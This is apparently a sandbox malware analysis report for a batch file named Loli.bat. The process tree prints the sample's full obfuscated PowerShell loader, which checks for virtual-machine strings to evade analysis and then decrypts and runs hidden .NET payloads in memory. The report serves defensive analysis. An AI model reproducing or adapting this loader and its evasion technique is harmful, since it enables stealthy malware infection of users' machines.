Overview

overview

10

Static

static

1

Loli.bat

windows7-x64

8

Loli.bat

windows10-2004-x64

10

Resubmissions

28-12-2024 18:43

241228-xc1xca1lck 10

28-12-2024 18:40

241228-xa6d2szpfw 10

Analysis

  • max time kernel
    117s
  • max time network
    118s
  • platform
    windows7_x64
  • resource
    win7-20240903-en
  • resource tags

    arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
  • submitted
    28-12-2024 18:40

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    Loli.bat

  • Size

    7.4MB

  • MD5

    747a4120cae88904b88472e7874d6352

  • SHA1

    d8cb67d6d0ad090624554f88e5fa29758f45b87c

  • SHA256

    4a75da4a68bc6d2a90931204e354dc2435ed5c2a8abe83642edf0039ec10cea0

  • SHA512

    f4962d58b9d743f389e463887db567a212802afd069d60644a46f7ef19f30f16c1596714ec7cea01fa34c2a39bac14620f523ca13ee2a01eae09dca99044876a

  • SSDEEP

    49152:SnfAqzDiVKf4rMNUZYiWPq6lR6aX1z3GCaFej4GA645ljbo9csn5ZtFQljN7Z8NY:r

Score
8/10
execution

Malware Config

Signatures

  • Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

    Run Powershell and hide display window.

    execution
  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of WriteProcessMemory 18 IoCs

Processes

  • C:\Windows\system32\cmd.exe
    cmd /c "C:\Users\Admin\AppData\Local\Temp\Loli.bat"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:2644
    • C:\Windows\system32\fsutil.exe
      fsutil fsinfo drives
      2⤵
        PID:2700
      • C:\Windows\system32\findstr.exe
        findstr /i /c:"QEMU HARDDISK" /c:"DADY HARDDISK" /c:"WDS100T2B0A"
        2⤵
          PID:2792
        • C:\Windows\system32\fsutil.exe
          fsutil fsinfo drives
          2⤵
            PID:2796
          • C:\Windows\system32\findstr.exe
            findstr /i /c:"BOCHS_" /c:"BXPC___" /c:"QEMU" /c:"VirtualBox"
            2⤵
              PID:2660
            • C:\Windows\system32\cmd.exe
              cmd.exe /c echo function OCQD($BovA){ Invoke-Expression -Verbose -InformationAction Ignore -WarningAction Inquire '$ptOc=[ZWSyZWsZWtZWemZW.ZWSZWeZWcZWuZWrZWitZWyZW.ZWCrZWyZWpZWtZWogZWrZWaZWpZWhZWy.ZWAeZWs]ZW:ZW:CZWreZWaZWtZWe(ZW)ZW;'.Replace('ZW', ''); Invoke-Expression -Verbose -WarningAction Inquire -Debug -InformationAction Ignore '$ptOc.MGjodGjeGj=Gj[SGjyGjsGjtGjeGjmGj.GjSeGjcGjuGjriGjtGjyGj.GjCrGjyGjpGjtGjoGjgrGjapGjhyGj.GjCiGjphGjeGjrGjMoGjdGjeGj]:Gj:GjCGjBCGj;'.Replace('Gj', ''); Invoke-Expression -Debug -InformationAction Ignore -Verbose '$ptOc.Pbfadbfdbfibfngbf=bf[bfSbfybfsbftbfembf.bfSbfecbfubfrbfibftybf.bfCbfrbfybfptbfogbfrabfpbfhybf.PbfabfdbfdibfnbfgbfMobfdbfebf]:bf:bfPbfKbfCSbf7;'.Replace('bf', ''); Invoke-Expression -Debug '$ptOc.KTbeyTb=Tb[TbSyTbsTbtTbeTbmTb.TbCTbonTbvTbeTbrtTb]Tb:Tb:TbFrTboTbmTbBTbaTbseTb64TbStTbrTbinTbg("OTbUeTbfTbKTbbtTbLTbiTbRTbJTbMTbWTbh9Tb2TbqTb20Tb1TbYTbITbCDTbPTb8TbxTbDTbkBTbJ5TbGHTbSTb0CTbKOTbsTb3Tb/QTb=Tb");'.Replace('Tb', ''); Invoke-Expression -WarningAction Inquire -InformationAction Ignore -Debug '$ptOc.IQdV=Qd[QdSQdysQdtQdeQdmQd.QdCQdoQdnvQdeQdrQdt]Qd:Qd:QdFQdroQdmQdBQdaQdsQde6Qd4SQdtrQdiQdngQd("7QdPMQdsQdtQdZZQdPQdCQddQdYQdRQdOQdytQdEQdWQdWNQdgQd6QdQQd==Qd");'.Replace('Qd', ''); $iIJK=$ptOc.CreateDecryptor(); $YTDD=$iIJK.TransformFinalBlock($BovA, 0, $BovA.Length); $iIJK.Dispose(); $ptOc.Dispose(); $YTDD;}function pyrM($BovA){ Invoke-Expression -Verbose '$OogZ=NZsewZs-ZsOZsbjZseZscZstZs ZsSZsyZsstZseZsmZs.IZsOZs.ZsMZsemZsoZsrZsyZsSZstrZseaZsm(,$BovA);'.Replace('Zs', ''); Invoke-Expression -InformationAction Ignore -WarningAction Inquire -Verbose -Debug '$CeKU=NZsewZs-ZsOZsbjZseZscZstZs ZsSZsyZsstZseZsmZs.IZsOZs.ZsMZsemZsoZsrZsyZsSZstrZseaZsm;'.Replace('Zs', ''); Invoke-Expression -InformationAction Ignore -Debug -Verbose '$ANEs=NPBewPB-PBOPBbjPBePBcPBtPB PBSPByPBstPBePBmPB.IPBOPB.PBCPBomPBpPBrPBePBsPBsiPBonPB.GPBZPBipPBStPBrPBePBamPB($OogZ, [PBIOPB.PBCPBomPBpPBrPBePBsPBsPBiPBonPB.PBCPBomPBpPBrPBePBssPBiPBoPBnPBMPBodPBe]PB::PBDPBecPBomPBpPBrPBesPBsPB);'.Replace('PB', ''); $ANEs.CopyTo($CeKU); $ANEs.Dispose(); $OogZ.Dispose(); $CeKU.Dispose(); $CeKU.ToArray();}function vykA($BovA,$dRUu){ Invoke-Expression -Debug -InformationAction Ignore -WarningAction Inquire '$wvZj=[ARSyARsARtARemAR.ARRAReARfARlAReARctARiARoARn.ARAARsARsARemARbARlARyAR]AR::ARLoARadAR([byte[]]$BovA);'.Replace('AR', ''); Invoke-Expression -InformationAction Ignore '$Opbk=$wvZj.EXyntXyrXyyXyPoXyiXynXyt;'.Replace('Xy', ''); Invoke-Expression -Debug -InformationAction Ignore -WarningAction Inquire -Verbose '$Opbk.SjInSjvSjoSjkeSj(Sj$SjnSjuSjlSjl, $dRUu);'.Replace('Sj', '');}$xnNA = 'C:\Users\Admin\AppData\Local\Temp\Loli.bat';$host.UI.RawUI.WindowTitle = $xnNA;$qtJd=[System.IO.File]::ReadAllText($xnNA).Split([Environment]::NewLine);foreach ($NMFm in $qtJd) { if ($NMFm.StartsWith('BIIUF')) { $DiIV=$NMFm.Substring(5); break; }}$zCME=[string[]]$DiIV.Split('\');Invoke-Expression -InformationAction Ignore -WarningAction Inquire -Verbose '$nDu = pyrM (OCQD ([sXCosXnsXvsXersXtsX]sX:sX:sXFsXrsXomsXBsXasXsesX6sX4sXSsXtrsXisXnsXg($zCME[0].Replace("#", "/").Replace("@", "A"))));'.Replace('sX', '');Invoke-Expression -WarningAction Inquire -InformationAction Ignore '$jgO = pyrM (OCQD ([sXCosXnsXvsXersXtsX]sX:sX:sXFsXrsXomsXBsXasXsesX6sX4sXSsXtrsXisXnsXg($zCME[1].Replace("#", "/").Replace("@", "A"))));'.Replace('sX', '');Invoke-Expression -Debug '$XmJ = pyrM (OCQD ([sXCosXnsXvsXersXtsX]sX:sX:sXFsXrsXomsXBsXasXsesX6sX4sXSsXtrsXisXnsXg($zCME[2].Replace("#", "/").Replace("@", "A"))));'.Replace('sX', '');vykA $nDu $null;vykA $jgO $null;vykA $XmJ (,[string[]] (''));
              2⤵
                PID:2820
              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                powershell.exe -WindowStyle Hidden
                2⤵
                • Command and Scripting Interpreter: PowerShell
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of AdjustPrivilegeToken
                PID:2824

            Network

            MITRE ATT&CK Enterprise v15

            Replay Monitor

            Loading Replay Monitor...

            Downloads

            • memory/2824-4-0x000007FEF64CE000-0x000007FEF64CF000-memory.dmp

              Filesize

              4KB

              Download

            • memory/2824-5-0x000000001B6D0000-0x000000001B9B2000-memory.dmp

              Filesize

              2.9MB

              Download

            • memory/2824-7-0x000007FEF6210000-0x000007FEF6BAD000-memory.dmp

              Filesize

              9.6MB

              Download

            • memory/2824-10-0x000007FEF6210000-0x000007FEF6BAD000-memory.dmp

              Filesize

              9.6MB

              Download

            • memory/2824-9-0x000007FEF6210000-0x000007FEF6BAD000-memory.dmp

              Filesize

              9.6MB

              Download

            • memory/2824-8-0x000007FEF6210000-0x000007FEF6BAD000-memory.dmp

              Filesize

              9.6MB

              Download

            • memory/2824-6-0x0000000001EF0000-0x0000000001EF8000-memory.dmp

              Filesize

              32KB

              Download

            • memory/2824-11-0x000007FEF6210000-0x000007FEF6BAD000-memory.dmp

              Filesize

              9.6MB

              Download

            • memory/2824-12-0x000007FEF64CE000-0x000007FEF64CF000-memory.dmp

              Filesize

              4KB

              Download

            • memory/2824-13-0x000007FEF6210000-0x000007FEF6BAD000-memory.dmp

              Filesize

              9.6MB

              Download